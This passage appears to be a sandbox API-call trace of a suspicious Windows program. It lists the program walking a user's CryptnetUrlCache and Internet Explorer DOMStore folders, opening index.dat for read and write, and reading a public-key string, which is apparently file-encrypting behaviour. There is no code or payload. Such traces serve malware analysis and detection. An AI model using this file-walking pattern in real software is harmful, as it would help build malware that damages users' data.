HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0172.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0172.960] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0172.960] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.960] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f4d0 [0172.960] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.960] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0172.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0172.960] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0172.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.960] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.961] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.961] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.961] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.961] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57ac8 [0172.961] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.961] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.961] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.961] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.961] PathFindFileNameW (pszPath="") returned="" [0172.961] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.961] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.961] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0172.961] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0172.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0172.963] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0172.964] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0172.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0172.965] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.966] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f4d0 [0172.966] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0172.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0172.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0172.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57ac8 [0172.967] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.967] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.967] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.967] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.967] PathFindFileNameW (pszPath="") returned="" [0172.967] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.967] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.967] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned=".dat" [0172.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.967] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=32768) returned 1 [0172.968] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.970] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.970] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.972] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.972] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x8000, lpOverlapped=0x0) returned 1 [0172.973] lstrlenA (lpString="-----BEGIN PUBLIC 